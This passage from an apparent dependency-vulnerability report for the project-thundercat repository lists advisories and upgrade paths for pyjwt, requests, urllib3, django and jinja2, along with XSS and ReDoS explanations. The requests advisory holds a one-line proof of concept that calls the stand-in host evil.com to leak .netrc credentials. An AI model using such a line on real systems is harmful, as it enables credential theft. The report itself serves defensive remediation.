This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type	Origin	Description
Stored	Server	The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected	Server	The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based	Client	The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated		The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

Web servers
Application servers
Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
Give users the option to disable client-side scripts.
Redirect invalid requests.
Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade djangorestframework to version 3.11.2 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity

new

Improper Cleanup on Thrown Exception

Vulnerable module: pyjwt
Introduced through: pyjwt@1.7.1, djangorestframework-jwt@1.11.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › pyjwt@1.7.1

Remediation: Upgrade to pyjwt@2.13.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-jwt@1.11.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-jwt@1.11.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Improper Cleanup on Thrown Exception via the get_signing_key function. An attacker can exhaust system resources by sending numerous JWTs with attacker-controlled kid values, causing repeated outbound requests to the JWKS endpoint.

Note:

This is only exploitable if the JWKS fetch fails and the upstream endpoint does not implement effective rate limiting or error handling.

Remediation

Upgrade pyjwt to version 2.13.0 or higher.

References

Improper Cleanup on Thrown Exception vulnerability report

medium severity

new

Inadequate Encryption Strength

Vulnerable module: pyjwt
Introduced through: pyjwt@1.7.1, djangorestframework-jwt@1.11.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › pyjwt@1.7.1

Remediation: Upgrade to pyjwt@2.11.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-jwt@1.11.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-jwt@1.11.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Inadequate Encryption Strength due to the HMAC and RSA key lengths used in the JSON Web Signature (JWS) implementation not meeting recommended security standards.

Remediation

Upgrade pyjwt to version 2.11.0 or higher.

References

Inadequate Encryption Strength vulnerability report

medium severity

Resource Exhaustion

Vulnerable module: idna
Introduced through: idna@2.8, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › idna@2.8

Remediation: Upgrade to idna@3.7.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › idna@2.8

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › idna@2.8

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › idna@2.8

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › idna@2.8
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › idna@2.8

Overview

Affected versions of this package are vulnerable to Resource Exhaustion via the idna.encode function. An attacker can consume significant resources and potentially cause a denial-of-service by supplying specially crafted arguments to this function.

Note: This is triggered by arbitrarily large inputs that would not occur in normal usage but may be passed to the library assuming there is no preliminary input validation by the higher-level application.

Remediation

Upgrade idna to version 3.7 or higher.

References

GitHub Commit

Resource Exhaustion vulnerability report

medium severity

Information Exposure

Vulnerable module: requests
Introduced through: requests@2.21.0, coreapi@2.3.3 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0

Remediation: Upgrade to requests@2.31.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0

Overview

Affected versions of this package are vulnerable to Information Exposure by leaking Proxy-Authorization headers to destination servers during redirects to an HTTPS origin. This is a result of how rebuild_proxies is used to recompute and reattach the Proxy-Authorization header to requests when redirected.

NOTE: This behavior has only been observed to affect proxied requests when credentials are supplied in the URL user information component (e.g. https://username:password@proxy:8080), and only when redirecting to HTTPS:

HTTP → HTTPS: leak
HTTPS → HTTP: no leak
HTTPS → HTTPS: leak
HTTP → HTTP: no leak

For HTTP connections sent through the proxy, the proxy will identify the header in the request and remove it prior to forwarding to the destination server. However when sent over HTTPS, the Proxy-Authorization header must be sent in the CONNECT request as the proxy has no visibility into further tunneled requests. This results in Requests forwarding the header to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate those credentials.

Workaround

This vulnerability can be avoided by setting allow_redirects to False on all calls through Requests top-level APIs, and then capturing the 3xx response codes to make a new request to the redirect destination.

Remediation

Upgrade requests to version 2.31.0 or higher.

References

Information Exposure vulnerability report

medium severity

Improper Removal of Sensitive Information Before Storage or Transfer

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@1.26.19.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Improper Removal of Sensitive Information Before Storage or Transfer due to the improper handling of the Proxy-Authorization header during cross-origin redirects when ProxyManager is not in use. When the conditions below are met, including non-recommended configurations, the contents of this header can be sent in an automatic HTTP redirect.

Notes:

To be vulnerable, the application must be doing all of the following:

Setting the Proxy-Authorization header without using urllib3's built-in proxy support.
Not disabling HTTP redirects (e.g. with redirects=False)
Either not using an HTTPS origin server, or having a proxy or target origin that redirects to a malicious origin.

Workarounds

Using the Proxy-Authorization header with urllib3's ProxyManager.
Disabling HTTP redirects using redirects=False when sending requests.
Not using the Proxy-Authorization header.

Remediation

Upgrade urllib3 to version 1.26.19, 2.2.2 or higher.

References

Improper Removal of Sensitive Information Before Storage or Transfer vulnerability report

medium severity

Open Redirect

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@2.5.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Open Redirect due to the retries parameter being ignored during PoolManager instantiation. An attacker can access unintended resources or endpoints by leveraging automatic redirects when the application expects redirects to be disabled at the connection pool level.

Note:

requests and botocore users are not affected.

Workaround

This can be mitigated by disabling redirects at the request() level instead of the PoolManager() level.

Remediation

Upgrade urllib3 to version 2.5.0 or higher.

References

GitHub Commit

Open Redirect vulnerability report

medium severity

Regular Expression Denial of Service (ReDoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@3.2.22.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the chars() and words() methods in the django.utils.text.Truncator function. An attacker can cause a denial of service by exploiting the inefficient regular expression complexity, which exhibits linear backtracking complexity and can be slow, given certain long and potentially malformed HTML inputs.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade django to version 3.2.22, 4.1.12, 4.2.6 or higher.

References

Regular Expression Denial of Service (ReDoS) vulnerability report

medium severity

Information Exposure Through Sent Data

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@1.26.17.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Information Exposure Through Sent Data when the Cookie HTTP header is used. An attacker can leak information via HTTP redirects to a different origin by exploiting the fact that the Cookie HTTP header isn't stripped on cross-origin redirects.

Note:

This is only exploitable if the user is using the Cookie header on requests, not disabling HTTP redirects, and either not using HTTPS or for the origin server to redirect to a malicious origin.

##Workaround:

This vulnerability can be mitigated by disabling HTTP redirects using redirects=False when sending requests and by not using the Cookie header.

Remediation

Upgrade urllib3 to version 1.26.17, 2.0.6 or higher.

References

Information Exposure Through Sent Data vulnerability report

medium severity

Insertion of Sensitive Information Into Sent Data

Vulnerable module: requests
Introduced through: requests@2.21.0, coreapi@2.3.3 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0

Remediation: Upgrade to requests@2.32.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0

Overview

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing. An attacker could craft a malicious URL that, when processed by the library, tricks it into sending the victim's .netrc credentials to a server controlled by the attacker.

Note:

This is only exploitable if the .netrc file contains an entry for the hostname that the attacker includes in the crafted URL's "intended" part (e.g., example.com in http://example.com:@evil.com/).

PoC

requests.get('http://example.com:@evil.com/&apos;)

Remediation

Upgrade requests to version 2.32.4 or higher.

References

Insertion of Sensitive Information Into Sent Data vulnerability report

medium severity

Always-Incorrect Control Flow Implementation

Vulnerable module: requests
Introduced through: requests@2.21.0, coreapi@2.3.3 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0

Remediation: Upgrade to requests@2.32.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0

Overview

Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session. An attacker can bypass certificate verification by making the first request with verify=False, causing all subsequent requests to ignore certificate verification regardless of changes to the verify value.

Notes:

For requests <2.32.0, avoid setting verify=False for the first request to a host while using a Requests Session.
For requests <2.32.0, call close() on Session objects to clear existing connections if verify=False is used.
This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.

Remediation

Upgrade requests to version 2.32.2 or higher.

References

Always-Incorrect Control Flow Implementation vulnerability report

medium severity

Information Exposure

Vulnerable module: djangorestframework-simplejwt
Introduced through: djangorestframework-simplejwt@4.3.0

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0

Remediation: Upgrade to djangorestframework-simplejwt@5.5.1.

Overview

djangorestframework-simplejwt is an A minimal JSON Web Token authentication plugin for Django REST Framework

Affected versions of this package are vulnerable to Information Exposure due to improper handling of sensitive information. An attacker can access web application resources even after their account has been disabled due to missing user validation checks via the for_user method.

Workaround

Ensure that before generating an access token for a user, there is a thorough verification process to determine whether the user is active or not. This validation step is essential in preventing unauthorized access and helps mitigate the vulnerability associated with the lack of user inactivity validation in the mentioned functionality. Implementing this check adds an extra layer of security to your application.

from django.contrib.auth.models import User
from rest_framework_simplejwt.tokens import AccessToken

user = User.objects.get(id=inactive_user_id)

if user and user.is_active: 
    token = AccessToken.for_user(user)

Remediation

Upgrade djangorestframework-simplejwt to version 5.5.1 or higher.

References

Information Exposure vulnerability report

medium severity

Cross-site Scripting (XSS)

Vulnerable module: jinja2
Introduced through: jinja2@2.10.1, coreschema@0.0.4 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › jinja2@2.10.1

Remediation: Upgrade to jinja2@3.1.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreschema@0.0.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Overview

Jinja2 is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the xmlattr filter, when using keys containing spaces in an application accepts keys as user input. An attacker can inject arbitrary HTML attributes into the rendered HTML template, bypassing the auto-escaping mechanism, which may lead to the execution of untrusted scripts in the context of the user's browser session.

Note Accepting keys as user input is not common or a particularly intended use case of the xmlattr filter, and an application doing so should already be verifying what keys are provided regardless of this fix.

Details

Types of attacks

There are a few methods by which XSS can be manipulated:

Type	Origin	Description
Stored	Server	The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected	Server	The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based	Client	The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated		The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

Web servers
Application servers
Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
Give users the option to disable client-side scripts.
Redirect invalid requests.
Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade Jinja2 to version 3.1.3 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity

Cross-site Scripting (XSS)

Vulnerable module: jinja2
Introduced through: jinja2@2.10.1, coreschema@0.0.4 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › jinja2@2.10.1

Remediation: Upgrade to jinja2@3.1.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreschema@0.0.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Overview

Jinja2 is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) through the xmlattr filter. An attacker can manipulate the output of web pages by injecting additional attributes into elements, potentially leading to unauthorized actions or information disclosure.

Note: This vulnerability derives from an improper fix of CVE-2024-22195, which only addressed spaces but not other characters.

Details

Types of attacks

There are a few methods by which XSS can be manipulated:

Type	Origin	Description
Stored	Server	The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected	Server	The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based	Client	The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated		The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

Web servers
Application servers
Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
Give users the option to disable client-side scripts.
Redirect invalid requests.
Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade Jinja2 to version 3.1.4 or higher.

References

GitHub Commit

Cross-site Scripting (XSS) vulnerability report

medium severity

Improper Neutralization

Vulnerable module: jinja2
Introduced through: jinja2@2.10.1, coreschema@0.0.4 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › jinja2@2.10.1

Remediation: Upgrade to jinja2@3.1.5.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreschema@0.0.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Overview

Affected versions of this package are vulnerable to Improper Neutralization when importing a macro in a template whose filename is also a template. This will result in a SyntaxError: f-string: invalid syntax error message because the filename is not properly escaped, indicating that it is being treated as a format string.

Note: This is only exploitable when the attacker controls both the content and filename of a template and the application executes untrusted templates.

Remediation

Upgrade jinja2 to version 3.1.5 or higher.

References

Improper Neutralization vulnerability report

medium severity

Template Injection

Vulnerable module: jinja2
Introduced through: jinja2@2.10.1, coreschema@0.0.4 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › jinja2@2.10.1

Remediation: Upgrade to jinja2@3.1.5.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreschema@0.0.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Overview

Affected versions of this package are vulnerable to Template Injection when an attacker controls the content of a template. This is due to an oversight in the sandboxed environment's method detection when using a stored reference to a malicious string's format method, which can then be executed through a filter.

Note: This is only exploitable through custom filters in an application.

Remediation

Upgrade jinja2 to version 3.1.5 or higher.

References

Template Injection vulnerability report

medium severity

Template Injection

Vulnerable module: jinja2
Introduced through: jinja2@2.10.1, coreschema@0.0.4 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › jinja2@2.10.1

Remediation: Upgrade to jinja2@3.1.6.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreschema@0.0.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Overview

Jinja2 is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.

Affected versions of this package are vulnerable to Template Injection through the |attr filter. An attacker that controls the content of a template can escape the sandbox and execute arbitrary Python code by using the |attr filter to get a reference to a string's plain format method, bypassing the environment's attribute lookup.

Note:

This is only exploitable if the application executes untrusted templates.

Remediation

Upgrade Jinja2 to version 3.1.6 or higher.

References

GitHub Commit

Template Injection vulnerability report

medium severity

Access Restriction Bypass

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

